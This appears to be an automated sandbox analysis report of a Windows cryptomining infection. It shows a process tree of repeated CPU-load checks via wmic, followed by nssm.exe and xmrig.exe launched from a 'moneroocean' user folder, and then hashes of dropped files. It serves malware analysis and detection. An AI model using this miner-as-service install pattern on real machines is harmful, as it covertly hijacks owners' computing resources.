C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3876

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1816

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:940

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:808

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:508

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4524

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:588

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3872

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4492

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:5036

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2248

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2176

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5072

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3084

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3988

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2072

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1912

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4208

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4656

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3068

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:916

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:5024

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1896

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4280

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3884

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3416

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2744

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2520

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2884

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2796

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4664

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4180

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:512

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3040

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2428

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:848

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3100

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2572

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:380

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3844

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:748

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:60

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4220

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1624

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4016

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3440

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1220

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3420

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5116

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1592

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3244

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3032

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2096

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1320

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4512

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4932

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:820

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1296

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3852

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1912

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3068

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3036

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3748

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4264

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4280

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4724

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3400

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3344

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4152

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3944

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:752

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4772

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5096

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3808

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:740

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3040

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:744

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2888

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4248

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2532

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2012

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4340

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4316

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1336

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5016

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:168

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3796

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2696

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1180

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1808

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2388

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4204

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1916

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4516

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2908

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2056

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1188

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4148

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3856

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2792

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3860

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3276

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3136

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1184

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2452

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1012

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:772

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3884

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:200

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3944

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4572

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2884

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2716

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4180

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:4652

C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3912

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8cd2c292d7d36babe840b558518061d5

SHA1
ef2a05ff20d32c6a6a25088e21c04fb06adb03e8

SHA256
a0689f07eac54c7bd98bfb07f9036a051cfacaefb67b469f320ba252e51b6f02

SHA512
035f67f9c107f5c169c99d6a80def75c334021c0b68ebfc117d60bd5a32a4c5dbccc01611b9d30034be9d1bfc6982df8ee1d6d894be73559a0c5232a6556e03b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e4fb5bc3b75b8644eb4caf989e2fc91f

SHA1
979c051c7624514f3fd1be90ba1c023dcb51c91a

SHA256
2b4d5278b7ba52651a6595e065b17873164b7eabd751058a4ee60a66d15d91c3

SHA512
7daf5439f7117ed0f3dfe855b551adb0341de5c6452031fe9a2066e6a6a78ccf22f20f598aacafe04f50ca62f0802669e4a87f07ad3d6453f3604d57f860b4db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
66ff4bbffdecc0f1d5adb4d0f83f3437

SHA1
71a55c5fdcdebab85f8b279335824fc53cdc4eea

SHA256
6b41bc4ce5001f4e0c6b046dc69939170a9a77dfb68422d8c8c7e0a2bdfc353b

SHA512
013271152c99bc1b9767605affa6af7941d393ac8e2bfad6148023f1a9247d997d5076615b6d85dc9e94307c018cf8ee8450143f3f47be69b3386680143c4345

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
93558a312e00cb245a13d60d8c2c7c56

SHA1
4e883915d66fb51cbdaa92167c623def09d393c2

SHA256
fa85befbcbc0a9b0e7c9f9750c5bfdfc2f3041af20844618b8951a72a25572c5

SHA512
aebedc2248afc32d015d01f0966fb72a114e361e44decfaa43d12f046ece8f43cb3cf3547f9d140a0296b275d3df0b9850fbdacd3e96b1acae1f9e0078b134f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
04bbb14cb877b047b3c28b65eef9d840

SHA1
cdbee6aca5888adcf9d0b92431779b3028a82532

SHA256
f180813b340f416179e8fefd8757246f954a2c17be7b4b3b496d1b601f49a50b

SHA512
4f589448b21d11119392a3665a87f71bab550695d4780c28c87e1b540e45a12a7e00173429f8de07ff62c2ade3d96fe38cbd6b88f3164f3833f94302848f4cd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7bf9c4147f210eab68b9d76eaefca830

SHA1
dd8d622dffb1fcdad624836b23f33d01b79a9a08

SHA256
21a083ee792d57c3788f4ba24a293431885961d7b7fd762100a6310c2065417d

SHA512
838c84a3e837d5a981c71dfe367abaca8b721c30d5f2fc3efebdd9b8a998b581aaca22d461eeeedb852bb3ae672f3575de609da2382018372e9df08e6c4368b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4f9d39bc8ff6b161a66bc071ebedee08

SHA1
a69526a24a8cd27eb20cf34a54c06132085d5e8a

SHA256
5e8273ddb295a3b3a66756d30504cefe5315ff6fc7cadd2d0ddfd9b4f79445a0

SHA512
7a6049ea99f5df952eefe067a2ab32568209474c16f3f5d11e97b603f241cc2ce130b4e9911ab58a5fba67ca70991b1750a4c5f3e88532b93c8f8851b623f830

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c214e6a6ce7d21641ef289ef2268b04a

SHA1
fd63b1c56cab27b8990abde947b318eb4afd0903

SHA256
cf28e14dab487a32b15833b1c147638a95ef89f3c84b41d053eac41cc9a2a266

SHA512
828f9ea577cb03d9b036f073fee146bff63ef35941f4a4ec8620b4237d429445e552b675c5bfc0ae31455f2347f655ad59f08ffdf9455f23e2ee206204b03e99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
5ff59030507e0327eabb5cac5a6c6e90

SHA1
17372eb5170bbc54125903b3a525582770dbde88

SHA256
31cf4492af088c4af29e7513353676fd9238e54ed4d66c69f41c6a14cc99356d

SHA512
abeca6dd3c6f4311e75736479416623c2d4aeef1d023fda5e207760482481f637b335e28662cefb06f5905d20b0b895b1e779610c55c9fdef09280ab3f2547bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
aa1c6ff9bb2d785b1e4121456d7fe3ce

SHA1
e140869e1743d0e487c5e1f82e21e2f833b583d6

SHA256
c3ee146d06f4cbc32f9711f53101d3c14b4907178202665b0d03395b70731717

SHA512
e0d93e8e186e016df9948bfea459b15159b23ad1d8946e601988264aca11fa4748662caaadfa2029d681c9c40a4216ab18e3889756dc00c853c2d9e87eac73b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4f4c7370d6f36c23ff353ee23c415b82

SHA1
d2a5ef9563b320f51400c605f5a317fd3d716889

SHA256
204f6ddf8ff7ae3f1d49dea75409ae5870ae8170bb083e0c44e1cfd400bf6261

SHA512
8e5722d945d17f3dc26507d879f1396930286ef58880cf9b442023614671bab83f32ef6e43e599c324ebcb515ccd4fec4eb3372ccfb1658a8bcbf4db3e9718f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
5a7c105f27e6c06f8cc73772f0533c70

SHA1
767483001168d42306543d8ef9b9883ae722b9e6

SHA256
ea64c6f1f0f48f78043e0648158a2e73da7ba9aa4e901a26e2462c3d80ed507c

SHA512
bef4289b68d5d0142b393f9057f23e9c3dc490dea1c5e63d1d03ee99d5cf838de2e815b6bf7db5e3284757beaa24c2b9158e476fa5b8042aaf05a9087a9a7b6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3rgdmar3.jp1.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7A70.tmp.bat
Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
e3b9b22db047eeacf220bc3b9c7f4eb2

SHA1
3b32a79bfde5b7860537e969a65c9ce854794efb

SHA256
5ef97aec367578d4ef6954f09f3ad4db6bb92d74dd08db7452c9e7bda32327d4

SHA512
0f9f534bcf09077b826fee22bfcdb24cdef734ab10f903687107b28b28c2e45cfa72655ae5716561a4b2aade574595a373f27df380792aa7bec3281056ab7d27

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
31ed789a202464014b0fbf4039772fb0

SHA1
cb75eaad1ce624384ddf70892620059864932213

SHA256
929598a3e63cef5075912d689cc6a3763e67f081d4b391777291f0b16a0715a2

SHA512
28aacb9d4eee50ae65873d8a82f949aae76b6b4f00c31af748b5b157f09b3683384f1f6ae00fa932580b93d5d9fbf98fecf192e9d2b8793caacc7db09858e2d5

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
d52562e26122d42cc556c8608a43bad7

SHA1
6f3e9fc3b44900f06ee66f5b1d65980e8513be9d

SHA256
4b0170591ebd2a839d83d503fee7615814bffbbcb17f05573076932b4ac324bf

SHA512
1778980a60c7a31eb96176ad2cc3f5848807454eab53cc45de2a65324191e5eaf2c58944096acf2f4da095becbed18c8e58293defbd205360acb98be4acbfaee

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
576a5acbfaaafb17dc3a121678eba919

SHA1
316d7b5c2363270521a929a5efafee566a7f9fbb

SHA256
6c6588695545807801b19eb67cfef5dce6308165669c6cceb34cd54ba4541fe8

SHA512
edf57b705b190a4758527f5410e24bcbb7e75e04e770ea2b9bab3a5b5d006f4b3d5ed39597ff125e971e3715be33fbfd65057fac4c3f526d3b66fe6d7de84c4f

Download Submit
C:\Users\Admin\moneroocean\nssm.exe
Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe
Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
